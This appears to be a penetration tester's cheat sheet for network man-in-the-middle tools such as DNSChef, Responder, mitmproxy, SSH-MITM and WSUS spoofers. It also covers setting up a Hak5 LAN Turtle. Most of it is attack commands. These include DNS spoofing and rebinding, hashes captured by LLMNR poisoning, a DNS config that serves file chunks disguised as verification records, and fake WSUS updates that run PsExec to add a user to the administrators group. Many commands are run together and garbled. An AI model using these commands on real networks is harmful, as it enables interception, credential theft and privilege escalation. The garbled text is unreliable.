- DNSChef
- DNSChef (NG)
- FakeDns
- fakessh
- Hak5 LAN Turtle
- mitmproxy
- PyWSUS
- Responder
- SSH-MITM
- tshark
- wsuks
| Name | Description | URL |
|---|---|---|
| DNSChef | DNSChef - DNS proxy for Penetration Testers and Malware Analysts | https://github.com/iphelix/dnschef |
| DNSChef (NG) | DNSChef (NG) - DNS proxy for Penetration Testers and Malware Analysts | https://github.com/byt3bl33d3r/dnschef-ng |
| FakeDns | A regular-expression based python MITM DNS server with support for DNS Rebinding attacks | https://github.com/Crypt0s/FakeDns |
| FakeSSH | A dockerized fake SSH server honeypot written in Go that logs login attempts. | https://github.com/fffaraz/fakessh |
| InterceptSuite | MITM proxy for TCP/TLS/DTLS/UDP traffic, with support for TLS upgrades like STARTTLS, PostgreSQL, and more. | https://github.com/InterceptSuite/InterceptSuite |
| mDNS | A mDNS sniffer and interpreter. | https://github.com/eldraco/Sapito |
| mitm6 | mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. | https://github.com/dirkjanm/mitm6 |
| mitmproxy | mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets. | https://github.com/mitmproxy/mitmproxy |
| PyWSUS | Standalone implementation of a part of the WSUS spec. Built for offensive security purposes. | https://github.com/GoSecure/pywsus |
| Responder | IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay. | https://github.com/lgandx/Responder |
| SharpWSUS | SharpWSUS is a CSharp tool for lateral movement through WSUS. | https://github.com/nettitude/SharpWSUS |
| SSH-MITM | ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation | https://github.com/ssh-mitm/ssh-mitm |
| wsuks | Automating the MITM attack on WSUS | https://github.com/NeffIsBack/wsuks |
[A] # Queries for IPv4 address records
*.thesprawl.org=192.0.2.1
[AAAA] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
[MX] # Queries for mail server records
*.thesprawl.org=mail.fake.com
[NS] # Queries for mail server records
*.thesprawl.org=ns.fake.com
[CNAME] # Queries for alias records
*.thesprawl.org=www.fake.com
[TXT] # Queries for text records
*.thesprawl.org=fake message
[PTR]
*.2.0.192.in-addr.arpa=fake.com
[SOA]
; FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
[NAPTR]
; FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! .
[SRV]
; FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
[DNSKEY]
; FORMAT: flags protocol algorithm base64(key)
*.thesprawl.org=256 3 5 AQPSKmynfzW4kyBv015MUG2DeIQ3Cbl+BBZH4b/0PY1kxkmvHjcZc8nokfzj31GajIQKY+5CptLr3buXA10hWqTkF7H6RfoRqXQeogmMHfpftf6zMv1LyBUgia7za6ZEzOJBOztyvhjL742iU/TpPSEDhm2SNKLijfUppn1UaNvv4w==
[RRSIG]
; FORMAT: covered algorithm labels labels orig_ttl sig_exp sig_inc key_tag name base64(sig)
*.thesprawl.org=A 5 3 86400 20030322173103 20030220173103 2642 thesprawl.org. oJB1W6WNGv+ldvQ3WDG0MQkg5IEhjRip8WTrPYGv07h108dUKGMeDPKijVCHX3DDKdfb+v6oB9wfuh3DTJXUAfI/M0zmO/zz8bW0Rznl8O3tGNazPwQKkRN20XPXV6nwwfoXmJQbsLNrLfkGJ5D6fwFm8nN+6pBzeDQfsS3Ap3o=$ sudo dnschef --file dnschef.inior
$ dnschef --interface <LHOST> --port 53 --tcp --file dnschef.ini$ proxychains bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<LHOST>' -c all --zip --dns-tcp --dns-timeout 30
$ proxychains bloodhound-python -u '<USERNAME>' -p '<PASSWORD>' -d '<DOMAIN>' -dc '<RHOST>' -ns '<LHOST>' -c all --zip --dns-tcp --dns-timeout 300 --disable-pooling -w 1$ pipx install dnschef-ng$ dnschef-ng -6
$ dnschef-ng --fakeip 127.0.0.1 -q
$ dnschef-ng --fakeip 127.0.0.1 --fakeipv6 ::1 -q
$ dnschef-ng --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.<DOMAIN> --fakealias www.<DOMAIN> --fakens ns.<DOMAIN> -q[A]
"<RHOST>"="<IP_ADDRESS>"
[NS]
"*.<DOMAIN>"="<RHOST>"
[PTR]
"*.1.1.192.in-addr.arpa"="<DOMAIN>"$ dnschef-ng --file dnschef.toml -q[A]
"*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 4 }
[AAAA]
"*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 16 }
[TXT]
"ns*.<DOMAIN>" = { file = "/PATH/TO/FILE/<FILE>", chunk_size = 189, response_format = "{prefix}test-{chunk}", response_prefix_pool = ["atlassian-domain-verification=", "onetrust-domain-verification=", "docusign=" ] }$ cat fake.conf
A <DOMAIN> 127.0.0.1 1%<LHOST>$ sudo python3 fakedns.py -c fake.conf --rebindnslookup > server <LHOST>
Default server: <LHOST>
Address: <LHOST>#53
> <FAKE_DOMAIN>
Server: <LHOST>
Address: <LHOST>#53
Name: <FAKE_DOMAIN>
Address: 127.0.0.1
*## server can't find <FAKE_DOMAIN>: NXDOMAIN
> <FAKE_DOMAIN>
Server: <LHOST>
Address: <LHOST>#53
Name: <FAKE_DOMAIN>
Address: <LHOST>
*## server can't find <FAKE_DOMAIN>: NXDOMAIN
>$ go install github.com/fffaraz/fakessh@latest
$ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
$ ./fakessh http://downloads.openwrt.org/releases/packages-19.07/mips_24kc/packages/gcc_7.4.0-5_mips_24kc.ipk
https://github.com/lgandx/Responder/archive/refs/heads/master.zip
$ ip a / ifconfig / ipconfig // have a look for 172.16.84.1
$ ssh root@172.16.84.1 // default password: sh3llz
$ Ctrl+c // get to root SSH session$ vim /etc/network/configconfig interface 'wan'
option ifname 'eth1'
option proto 'dhcp'
option metric '20'
option ipv6 '0'$ /etc/init.d/network restart$ cat /etc/opkg.confdest root /
dest ram /tmp
dest sd /sdThe exports should go to the .bashrc to make it persistent.
$ opkg install python3 --dest sd
$ export LD_LIBRARY_PATH="/sd/usr/lib:/usr/lib"
$ opkg install python3-pip --dest sd
$ export PATH="/sd/usr/bin:$PATH"
$ mkdir /sd/python3-modules
$ export PYTHONHOME="/sd/usr/"
$ export PYTHONPATH="/sd/python3-modules"
$ python3 -m pip install setuptools --target=/sd/python3-modules
$ python3 -m pip install wheel --target=/sd/python3-modules
$ wget http://downloads.openwrt.org/releases/packages-19.07/mips_24kc/packages/gcc_7.4.0-5_mips_24kc.ipk
$ scp gcc_7.4.0-5_mips_24kc.ipk root@172.16.84.1:/sd/gcc_7.4.0-5_mips_24kc.ipk
$ opkg install gcc_7.4.0-5_mips_24kc.ipk --dest sd
$ opkg install libffi --dest sd
$ opkg install python3-dev --dest sd
$ export CFLAGS="-I/sd/usr/include/bits/ -I/sd/usr/include/ -I/sd/usr/include/linux/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/install-tools/include/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/include-fixed/"
$ export CFLAGS="-I/sd/usr/include/"
$ python3 -m pip install netifaces --target=/sd/python3-modules$ export LD_LIBRARY_PATH="/sd/usr/lib:/usr/lib"
$ export PATH="/sd/usr/bin:$PATH"
$ export PYTHONHOME="/sd/usr/"
$ export PYTHONPATH="/sd/python3-modules"
$ export CFLAGS="-I/sd/usr/include/bits/ -I/sd/usr/include/ -I/sd/usr/include/linux/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/install-tools/include/ -I/sd/usr/lib/gcc/mips-openwrt-linux-musl/7.4.0/include-fixed/"
$ export CFLAGS="-I/sd/usr/include/"$ cd /sd
$ wget https://github.com/lgandx/Responder/archive/refs/heads/master.zip
$ opkg install unzip --dest sd
$ unzip responder.zip
$ mv Responder-master Responder/sd/Responder/certs#!/bin/bash
openssl genrsa out responder.key 2048
openssl req -new -x509 -days 3650 -key responder.key -out responder.crt -subj "/"Create the certificates locally and copy it to the LAN Turtle before you start Responder.
$ openssl genrsa -out <FILE>.key 2048$ openssl req -new -key <FILE>.key -out <FILE>.csr -subj "/CN=<DOMAIN>"$ openssl x509 -req -in <FILE>.csr -CA RootCA.crt -CAkey RootCA.key -CAcreateserial -out <FILE>.crt -days 365$ cat <FILE>.key <FILE>.crt > <FILE>.pem$ mitmproxy --mode reverse:https://<RHOST> --certs <FILE>.pem --save-stream-file <FILE>.raw -k -p 443$ python3 -m virtualenv venv$ source venv/bin/activate$ sudo apt install libxml2-dev libxslt1-dev python3-dev -y$ sed -i 's/lxml==4.6.2/lxml==5.3.0/' requirements.txt$ pip install -r requirements.txt$ git fetch origin pull/18/head:pr18$ git checkout pr18$ sed -i "s/ parser.add_argument('-v', '--verbose'/ parser.add_argument('--cert', default=None, help='Path to SSL certificate.')\n parser.add_argument('--key', default=None, help='Path to SSL private key.')\n parser.add_argument('-v', '--verbose'/" pywsus.py$ sed -i 's/def run(host, port, server_class=HTTPServer, handler_class=WSUSBaseServer):/def run(host, port, cert=None, key=None, server_class=HTTPServer, handler_class=WSUSBaseServer):/' pywsus.py$ sed -i 's/ httpd = server_class(server_address, handler_class)/ httpd = server_class(server_address, handler_class)\n if cert and key:\n import ssl\n ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n ctx.load_cert_chain(certfile=cert, keyfile=key)\n httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)/' pywsus.py$ sed -i 's/ run(host=args.host, port=args.port)/ run(host=args.host, port=args.port, cert=args.cert, key=args.key)/' pywsus.py$ python3 pywsus.py -H <RHOST> -p 8531 -e PsExec64.exe -c '-accepteula -s cmd.exe /c net localgroup administrators <USERNAME> /add' --cert <FILE>.crt --key <FILE>.key$ sudo responder -I <INTERFACE>$ ssh-mitm server$ ssh-mitm server --remote-host <RHOST>
$ socat TCP-LISTEN:<RPORT>,fork TCP:127.0.0.1:10022$ tshark -i <INTERFACE> -Y 'smtp.data.fragments' -T fields -e 'text'$ tshark --Y http.request -T fields -e http.host -e http.user_agent -r <FILE>.pcap$ sudo wsuks --serve-only --tls-cert <FILE>.pem -e PsExec64.exe -c '-accepteula -s cmd.exe /c net localgroup administrators <USERNAME> /add' -I <INTERFACE>